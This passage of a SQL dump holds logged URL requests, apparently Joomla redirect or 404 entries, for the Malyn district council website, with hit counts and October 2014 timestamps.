01:13:45','0000-00-00 00:00:00',301),(6335,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-02 01:29:30','0000-00-00 00:00:00',301),(6336,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-02 01:34:37','0000-00-00 00:00:00',301),(6337,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-02 01:38:13','0000-00-00 00:00:00',301),(6338,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-02 01:49:37','0000-00-00 00:00:00',301),(6339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-02 01:57:40','0000-00-00 00:00:00',301),(6340,'http://www.malyn-rayrada.org.ua/index.php?Itemid=93&catid=52&id=1067:2013-08-16-15-28-50&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-02 02:04:24','0000-00-00 00:00:00',301),(6341,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1252:2014-03-24-17-19-07&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-02 02:09:34','0000-00-00 00:00:00',301),(6342,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&lang=ru&Itemid=','','','',6,0,'2014-10-02 02:32:51','0000-00-00 00:00:00',301),(6343,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=en','','','',5,0,'2014-10-02 03:02:33','0000-00-00 00:00:00',301),(6344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=en','','','',5,0,'2014-10-02 04:14:48','0000-00-00 00:00:00',301),(6345,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1072:-24-6-&lang=ru&option=com_content&view=article','','','',5,0,'2014-10-02 04:17:26','0000-00-00 00:00:00',301),(6346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-10-02 05:29:08','0000-00-00 00:00:00',301),(6347,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-02 05:48:26','0000-00-00 00:00:00',301),(6348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=uk','','','',4,0,'2014-10-02 06:35:28','0000-00-00 00:00:00',301),(6349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=en&Itemid=0','','','',8,0,'2014-10-02 06:36:20','0000-00-00 00:00:00',301),(6350,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10&Itemid=17&lang=uk','','','',8,0,'2014-10-02 06:36:25','0000-00-00 00:00:00',301),(6351,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-02 06:37:38','0000-00-00 00:00:00',301),(6352,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57&Itemid=98&lang=en','','','',6,0,'2014-10-02 06:39:27','0000-00-00 00:00:00',301),(6353,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10&Itemid=17&lang=en','','','',1,0,'2014-10-02 06:39:50','0000-00-00 00:00:00',301),(6354,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-02 06:39:51','0000-00-00 00:00:00',301),(6355,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-10-02 06:41:46','0000-00-00 00:00:00',301),(6356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-10-02 06:43:07','0000-00-00 00:00:00',301),(6357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-10-02 06:43:17','0000-00-00 00:00:00',301),(6358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-10-02 06:43:23','0000-00-00 00:00:00',301),(6359,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57&Itemid=98&lang=uk','','','',2,0,'2014-10-02 06:43:36','0000-00-00 00:00:00',301),(6360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=en&Itemid=','','','',2,0,'2014-10-02 06:43:40','0000-00-00 00:00:00',301),(6361,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-02 06:43:59','0000-00-00 00:00:00',301),(6362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-10-02 06:44:02','0000-00-00 00:00:00',301),(6363,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',14,0,'2014-10-02 06:44:04','0000-00-00 00:00:00',301),(6364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',19,0,'2014-10-02 06:44:06','0000-00-00 00:00:00',301),(6365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',4,0,'2014-10-02 06:45:30','0000-00-00 00:00:00',301),(6366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-10-02 06:50:45','0000-00-00 00:00:00',301),(6367,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1033:2013-06-18-12-58-36&Itemid=92&lang=en&option=com_content&view=article','','','',1,0,'2014-10-02 07:01:34','0000-00-00 00:00:00',301),(6368,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-02 07:05:34','0000-00-00 00:00:00',301),(6369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-10-02 07:06:40','0000-00-00 00:00:00',301),(6370,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=uk','','','',2,0,'2014-10-02 07:06:47','0000-00-00 00:00:00',301),(6371,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1293:-2014-&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?fm=1&gp=custom1&rf=10445&q=+%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%B0+%D1%81%D0%BE%D1%86%D1%96%D0%B0%D0%BB%D1%8C%D0%BD','',3,0,'2014-10-02 07:13:29','0000-00-00 00:00:00',301),(6372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-02 07:17:12','0000-00-00 00:00:00',301),(6373,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57:--15042014-&Itemid=98&lang=uk','','','',2,0,'2014-10-02 07:28:57','0000-00-00 00:00:00',301),(6374,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=en','','','',4,0,'2014-10-02 07:29:09','0000-00-00 00:00:00',301),(6375,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',2,0,'2014-10-02 07:29:39','0000-00-00 00:00:00',301),(6376,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-02 07:30:32','0000-00-00 00:00:00',301),(6377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&Itemid=14&lang=en','','','',11,0,'2014-10-02 07:39:47','0000-00-00 00:00:00',301),(6378,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57:--15042014-&Itemid=98&lang=ru','','','',2,0,'2014-10-02 07:40:06','0000-00-00 00:00:00',301),(6379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57:--15042014-&Itemid=98&lang=ru','','','',6,0,'2014-10-02 07:40:12','0000-00-00 00:00:00',301),(6380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57:--15042014-&Itemid=98&lang=uk','','','',3,0,'2014-10-02 07:40:14','0000-00-00 00:00:00',301),(6381,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=en&Itemid=','','','',5,0,'2014-10-02 07:40:24','0000-00-00 00:00:00',301),(6382,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10&Itemid=17&lang=ru','','','',6,0,'2014-10-02 07:40:32','0000-00-00 00:00:00',301),(6383,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-10-02 07:40:51','0000-00-00 00:00:00',301),(6384,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-02 07:41:02','0000-00-00 00:00:00',301),(6385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',3,0,'2014-10-02 07:46:13','0000-00-00 00:00:00',301),(6386,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15&lang=en&Itemid=0','','','',3,0,'2014-10-02 07:48:38','0000-00-00 00:00:00',301),(6387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-10-02 07:49:25','0000-00-00 00:00:00',301),(6388,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57&Itemid=98&lang=ru','','','',3,0,'2014-10-02 07:51:46','0000-00-00 00:00:00',301),(6389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-10-02 07:53:48','0000-00-00 00:00:00',301),(6390,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-10-02 07:56:26','0000-00-00 00:00:00',301),(6391,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=en','','','',2,0,'2014-10-02 08:19:34','0000-00-00 00:00:00',301),(6392,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-02 08:23:38','0000-00-00 00:00:00',301),(6393,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-02 08:35:17','0000-00-00 00:00:00',301),(6394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',13,0,'2014-10-02 08:45:54','0000-00-00 00:00:00',301),(6395,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=en','','','',2,0,'2014-10-02 08:47:21','0000-00-00 00:00:00',301),(6396,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-02 09:02:45','0000-00-00 00:00:00',301),(6397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-02 09:03:41','0000-00-00 00:00:00',301),(6398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-10-02 09:25:32','0000-00-00 00:00:00',301),(6399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=ru','','','',4,0,'2014-10-02 09:26:31','0000-00-00 00:00:00',301),(6400,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58&Itemid=105&lang=uk','','','',2,0,'2014-10-02 09:26:32','0000-00-00 00:00:00',301),(6401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-02 09:26:33','0000-00-00 00:00:00',301),(6402,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-02 09:26:37','0000-00-00 00:00:00',301),(6403,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=uk&Itemid=','','','',12,0,'2014-10-02 09:29:27','0000-00-00 00:00:00',301),(6404,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=en','','','',5,0,'2014-10-02 09:41:42','0000-00-00 00:00:00',301),(6405,'http://www.malyn-rayrada.org.ua/index.php?Itemid=93&catid=52&id=1067:2013-08-16-15-28-50&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-02 09:49:20','0000-00-00 00:00:00',301),(6406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=ru','','','',2,0,'2014-10-02 09:49:57','0000-00-00 00:00:00',301),(6407,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-02 09:49:59','0000-00-00 00:00:00',301),(6408,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52:--16082013-&Itemid=93&lang=uk','','','',5,0,'2014-10-02 09:52:40','0000-00-00 00:00:00',301),(6409,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58&Itemid=105&lang=uk','','','',2,0,'2014-10-02 09:54:56','0000-00-00 00:00:00',301),(6410,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-10-02 09:55:37','0000-00-00 00:00:00',301),(6411,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-02 09:56:36','0000-00-00 00:00:00',301),(6412,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&lang=ru&Itemid=','','','',11,0,'2014-10-02 09:59:39','0000-00-00 00:00:00',301),(6413,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-02 10:07:05','0000-00-00 00:00:00',301),(6414,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58:--30042014-&Itemid=105&lang=uk','','','',3,0,'2014-10-02 10:10:09','0000-00-00 00:00:00',301),(6415,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56:--03022014-&Itemid=97&lang=en','','','',2,0,'2014-10-02 10:18:59','0000-00-00 00:00:00',301),(6416,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-02 10:23:20','0000-00-00 00:00:00',301),(6417,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-02 10:24:22','0000-00-00 00:00:00',301),(6418,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=uk','','','',2,0,'2014-10-02 10:30:12','0000-00-00 00:00:00',301),(6419,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10&Itemid=17&lang=en','','','',2,0,'2014-10-02 10:31:10','0000-00-00 00:00:00',301),(6420,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10&Itemid=17&lang=en','','','',1,0,'2014-10-02 10:31:12','0000-00-00 00:00:00',301),(6421,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-02 10:45:29','0000-00-00 00:00:00',301),(6422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=36&Itemid=70&lang=en','','','',8,0,'2014-10-02 10:46:46','0000-00-00 00:00:00',301),(6423,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56&Itemid=97&lang=en','','','',2,0,'2014-10-02 10:46:51','0000-00-00 00:00:00',301),(6424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-02 10:51:25','0000-00-00 00:00:00',301),(6425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-02 10:58:16','0000-00-00 00:00:00',301),(6426,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-02 10:58:19','0000-00-00 00:00:00',301),(6427,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1379:2014-09-01-08-47-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-02 10:58:50','0000-00-00 00:00:00',301),(6428,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57&Itemid=98&lang=en','','','',2,0,'2014-10-02 10:59:00','0000-00-00 00:00:00',301),(6429,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-02 11:05:17','0000-00-00 00:00:00',301),(6430,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-10-02 11:21:13','0000-00-00 00:00:00',301),(6431,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=ru','','','',2,0,'2014-10-02 11:26:12','0000-00-00 00:00:00',301),(6432,'http://www.malyn-rayrada.org.ua/images/stories/luna.php?rf','','','',1,0,'2014-10-02 11:44:35','0000-00-00 00:00:00',301),(6433,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=ru','','','',2,0,'2014-10-02 11:44:57','0000-00-00 00:00:00',301),(6434,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=en','','','',6,0,'2014-10-02 11:49:24','0000-00-00 00:00:00',301),(6435,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10&Itemid=17&lang=ru','','','',9,0,'2014-10-02 11:50:02','0000-00-00 00:00:00',301),(6436,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-02 11:53:56','0000-00-00 00:00:00',301),(6437,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57:--15042014-&Itemid=98&lang=en','','','',5,0,'2014-10-02 11:55:07','0000-00-00 00:00:00',301),(6438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=ru','','','',4,0,'2014-10-02 11:58:19','0000-00-00 00:00:00',301),(6439,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-02 12:00:00','0000-00-00 00:00:00',301),(6440,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-02 12:06:24','0000-00-00 00:00:00',301),(6441,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=uk','','','',2,0,'2014-10-02 12:16:08','0000-00-00 00:00:00',301),(6442,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=uk','','','',2,0,'2014-10-02 12:16:09','0000-00-00 00:00:00',301),(6443,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=uk&Itemid=','','','',3,0,'2014-10-02 12:33:59','0000-00-00 00:00:00',301),(6444,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',1,0,'2014-10-02 12:39:03','0000-00-00 00:00:00',301),(6445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-02 12:39:10','0000-00-00 00:00:00',301),(6446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-02 12:44:40','0000-00-00 00:00:00',301),(6447,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',1,0,'2014-10-02 12:45:41','0000-00-00 00:00:00',301),(6448,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=ru','','','',1,0,'2014-10-02 12:46:11','0000-00-00 00:00:00',301),(6449,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=uk','','','',2,0,'2014-10-02 12:46:14','0000-00-00 00:00:00',301),(6450,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-02 12:48:47','0000-00-00 00:00:00',301),(6451,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&lang=uk','','','',2,0,'2014-10-02 12:48:50','0000-00-00 00:00:00',301),(6452,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&lang=ru','','','',4,0,'2014-10-02 12:49:53','0000-00-00 00:00:00',301),(6453,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=uk','','','',3,0,'2014-10-02 12:52:56','0000-00-00 00:00:00',301),(6454,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-02 12:54:26','0000-00-00 00:00:00',301),(6455,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=47:--21022013-&Itemid=86&lang=ru','','','',1,0,'2014-10-02 12:55:23','0000-00-00 00:00:00',301),(6456,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55:--26122013-&Itemid=96&lang=ru','','','',3,0,'2014-10-02 12:56:01','0000-00-00 00:00:00',301),(6457,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-02 13:01:14','0000-00-00 00:00:00',301),(6458,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-02 13:03:56','0000-00-00 00:00:00',301),(6459,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2013-01-06-09-42-40&catid=11&lang=uk&Itemid=','','','',5,0,'2014-10-02 13:04:08','0000-00-00 00:00:00',301),(6460,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-02 13:05:03','0000-00-00 00:00:00',301),(6461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-02 13:05:10','0000-00-00 00:00:00',301),(6462,'http://www.malyn-rayrada.org.ua/templates/yoo_level','','','',4,0,'2014-10-02 13:11:38','0000-00-00 00:00:00',301),(6463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-02 13:12:59','0000-00-00 00:00:00',301),(6464,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55&Itemid=96&lang=ru','','','',2,0,'2014-10-02 13:13:20','0000-00-00 00:00:00',301),(6465,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-02 13:22:50','0000-00-00 00:00:00',301),(6466,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-02 13:29:17','0000-00-00 00:00:00',301),(6467,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-02 13:30:26','0000-00-00 00:00:00',301),(6468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-10-02 13:34:08','0000-00-00 00:00:00',301),(6469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=57:--15042014-&Itemid=98&lang=en','','','',10,0,'2014-10-02 13:34:21','0000-00-00 00:00:00',301),(6470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=57:--15042014-&Itemid=98&lang=ru','','','',1,0,'2014-10-02 13:34:25','0000-00-00 00:00:00',301),(6471,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-02 13:41:36','0000-00-00 00:00:00',301),(6472,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-02 13:46:26','0000-00-00 00:00:00',301),(6473,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=en','','','',5,0,'2014-10-02 13:47:42','0000-00-00 00:00:00',301),(6474,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56&Itemid=97&lang=uk','','','',3,0,'2014-10-02 13:49:59','0000-00-00 